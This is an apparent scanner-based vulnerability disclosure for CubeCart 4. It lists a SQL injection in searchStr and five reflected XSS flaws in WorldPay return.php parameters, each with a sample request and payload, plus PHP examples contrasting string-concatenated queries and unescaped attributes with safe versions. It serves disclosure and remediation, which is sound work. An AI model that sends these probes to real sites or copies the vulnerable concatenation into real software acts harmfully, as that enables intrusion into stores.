SQL Injection and XSS
1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.
5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.
6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.

Additional details:

SQL query:

Code:
Error message:
SQL:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''

Sample HTTP Request:

Code:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
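
The error above shows the searchStr value landing inside a quoted SQL string. The following is an added example, not CubeCart's code: it assumes the query is built by string concatenation, uses an in-memory SQLite database with constructed rows in place of the store's database, and compares that pattern with a bound parameter. The function names search_concat() and search_bound() are hypothetical.

```php
<?php
// Added example, not CubeCart code. Table contents are constructed; in-memory
// SQLite stands in for the store's real database (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE cube_CubeCart_search (id INTEGER PRIMARY KEY, searchstr TEXT)");
$db->exec("INSERT INTO cube_CubeCart_search (searchstr) VALUES ('shirt'), ('o''brien mug')");

// Assumed vulnerable pattern: the parameter is pasted into the SQL text, so a
// lone quote produces the query from the report: ... WHERE searchstr='''
function search_concat(PDO $db, string $searchStr): array {
    $sql = "SELECT id FROM cube_CubeCart_search WHERE searchstr='" . $searchStr . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the SQL text is fixed and the value is bound as data, so
// quotes in the input never reach the SQL parser.
function search_bound(PDO $db, string $searchStr): array {
    $stmt = $db->prepare("SELECT id FROM cube_CubeCart_search WHERE searchstr = :s");
    $stmt->execute([':s' => $searchStr]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// A normal term, the report's single quote, and a legitimate value with a quote.
foreach (["shirt", "'", "o'brien mug"] as $input) {
    try {
        $concat = 'ids=' . json_encode(search_concat($db, $input));
    } catch (PDOException $e) {
        $concat = 'SQL error: ' . $e->getMessage();
    }
    $bound = 'ids=' . json_encode(search_bound($db, $input));
    printf("input %-14s\n  concat: %s\n  bound:  %s\n",
        var_export($input, true), $concat, $bound);
}
```

The concatenated query fails on both quoted inputs, including the legitimate one, while the bound query treats them as ordinary search terms.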


2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.

Attack details

URL encoded GET input amount was set to " onmouseover=prompt(949088) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Code:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.

Attack details

URL encoded GET input cartId was set to " onmouseover=prompt(932890) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Code:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR

4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.

Attack details

URL encoded GET input email was set to " onmouseover=prompt(908306) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Code:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.

Attack details

URL encoded GET input transId was set to " onmouseover=prompt(998313) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Code:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

Attack details

URL encoded GET input transStatus was set to " onmouseover=prompt(923101) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Code:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
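
Findings 2 to 6 share one cause: a parameter is written into a double-quoted attribute value without encoding. The following is an added example, not CubeCart's code: render_field() and its hidden-input markup are hypothetical, and only the query string is taken from the "amount" request above. It parses the generated markup to show which attributes the element ends up with, raw and escaped.

```php
<?php
// Added example, not CubeCart code. render_field() and attribute_names() are
// hypothetical helpers; the query string is the one from the "amount" request.
parse_str('amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22'
        . '&cartId=&email=&transId=&transStatus=', $query);

// Reflect one parameter into a double-quoted attribute value.
function render_field(string $name, string $value, bool $escape): string {
    if ($escape) {
        // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
        $value = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    return '<input type="hidden" name="' . $name . '" value="' . $value . '">';
}

// Parse the markup with an HTML parser and list the element's attribute names.
function attribute_names(string $html): array {
    libxml_use_internal_errors(true);   // keep parser warnings out of the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

foreach (['amount', 'cartId', 'email', 'transId', 'transStatus'] as $param) {
    $raw  = attribute_names(render_field($param, $query[$param], false));
    $safe = attribute_names(render_field($param, $query[$param], true));
    // Anything beyond type/name/value came from the parameter's content.
    $extra = array_diff($raw, ['type', 'name', 'value']);
    printf("%-12s raw: [%s]  escaped: [%s]  injected: [%s]\n",
        $param, implode(',', $raw), implode(',', $safe), implode(',', $extra));
}
```

The same encoding call applies to each of the five parameters; the check on attribute names can be reused as a regression test for any template that reflects request values into attributes.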


These vulnerabilities were reported to the CubeCart team on 22/7/2010 via the support system on their website, and they were fixed in the latest version of CubeCart. If you are using CubeCart, download the latest version from their website.


 
 